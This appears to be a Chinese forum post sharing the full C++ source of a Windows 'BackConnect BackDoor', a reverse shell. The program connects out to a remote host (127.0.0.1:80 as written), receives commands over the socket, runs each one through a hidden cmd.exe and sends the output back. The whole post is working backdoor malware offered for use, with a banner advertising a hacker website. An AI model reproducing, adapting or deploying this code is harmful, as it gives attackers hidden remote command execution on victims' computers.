vc++反向连接后门

大灰狼

1. #include<winsock2.h>
   
2. #include<stdio.h>
   
3. #pragma comment(lib,"ws2_32.lib")
   
4. void main(int argc,char **argv)
   
5. {
   
6. char *messages = "/r/n======================== BackConnect BackDoor V0.1 ========================/r/n========= Welcome toHttp://www.hackerxfiles.net =========/r/n";
   
7. WSADATA WSAData;
   
8. SOCKET sock;
   
9. SOCKADDR_IN addr_in;
   
10. char buf1[1024];   //作为socket接收数据的缓冲区
    
11. memset(buf1,0,1024);   //清空缓冲区
    
12. 
    
13. if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    
14.    {
    
15.      printf("WSAStartup error.Error:d/n",WSAGetLastError());
    
16.      return;
    
17.    }
    
18.    addr_in.sin_family=AF_INET;
    
19.    addr_in.sin_port=htons(80);  //反向连接的远端主机端口
    
20.    addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");  //远端IP
    
21.    
    
22.    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    
23.    {
    
24.      printf("Socket failed.Error:d/n",WSAGetLastError());
    
25.      return;
    
26.    }
    
27.    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)     //连接客户主机
    
28.    {
    
29.      printf("Connect failed.Error:d",WSAGetLastError());
    
30.      return;
    
31.    }
    
32.    
    
33.    if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR)  //发送欢迎信息
    
34.    {
    
35.         printf("Send failed.Error:d/n",WSAGetLastError());
    
36.         return;
    
37.    }
    
38.    
    
39. char buffer[2048] = {0};//管道输出的数据
    
40. 
    
41. for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
    
42. SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
    
43. HANDLE hRead,hWrite;
    
44. sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    
45. sa.lpSecurityDescriptor = NULL;
    
46. sa.bInheritHandle = TRUE;
    
47. if (!CreatePipe(&hRead,&hWrite,&sa,0))
    
48. {
    
49.   printf("Error On CreatePipe()");
    
50.      return;
    
51. }
    
52. 
    
53. STARTUPINFO si;
    
54. PROCESS_INFORMATION pi;
    
55. si.cb = sizeof(STARTUPINFO);
    
56. GetStartupInfo(&si);
    
57. si.hStdError = hWrite;
    
58. si.hStdOutput = hWrite;
    
59. si.wShowWindow = SW_HIDE;
    
60. si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    
61. GetSystemDirectory(cmdline,MAX_PATH+1);
    
62. strcat(cmdline,"//cmd.exe /c");
    
63. 
    
64. int   len=recv(sock,buf1,1024,NULL);
    
65. if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接，则自动退出程序
    
66. if(len<=1){send(sock,"error/n",sizeof("error/n"),0);continue;}
    
67. 
    
68. strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdline
    
69. if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
    
70. {
    
71. send(sock,"Error command/n",sizeof("Error command/n"),0);
    
72. continue;
    
73. }
    
74.   
    
75. CloseHandle(hWrite);
    
76. //循环读取管道中数据并发送，直到管道中没有数据为止
    
77. for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){  
    
78. send(sock,buffer,strlen(buffer),0);
    
79. }
    
80. 
    
81.    }
    
82. }
    

复制代码